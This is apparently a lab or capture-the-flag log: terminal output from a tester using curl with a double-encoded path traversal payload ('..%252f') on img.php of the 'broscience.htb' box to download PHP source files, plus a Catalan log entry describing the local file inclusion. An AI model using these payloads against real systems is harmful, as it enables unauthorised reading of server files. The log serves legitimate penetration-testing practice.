┌─[lao@parrot]─[~/broscience]
└──╼ $curl --insecure https://broscience.htb/includes/img.php?path=..%252findex.php > index.php
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 2182 100 2182 0 0 18818 0 --:--:-- --:--:-- --:--:-- 18973
┌─[lao@parrot]─[~/broscience]
└──╼ $curl --insecure https://broscience.htb/includes/img.php?path=..%252flogin.php > login.php
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 3028 100 3028 0 0 25693 0 --:--:-- --:--:-- --:--:-- 25880
┌─[lao@parrot]─[~/broscience]
└──╼ $curl --insecure https://broscience.htb/includes/img.php?path=..%252factivate.php > activate.php
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 2026 100 2026 0 0 17418 0 --:--:-- --:--:-- --:--:-- 17465
Persona --> Cristian Temps --> 27/02/2023 --> 20:10 --> 20:20 Acció --> Path traversal amb double encode (https://owasp.org/www-community/Double_Encoding) Endpoint --> https://broscience.htb/index.php, https://broscience.htb/login.php, https://broscience.htb/activate.php Resultat --> Ens hem descarregat fitxers de codi de la pàgina amb el path traversal en el Local File Inclusion del fitxer img.php. Output: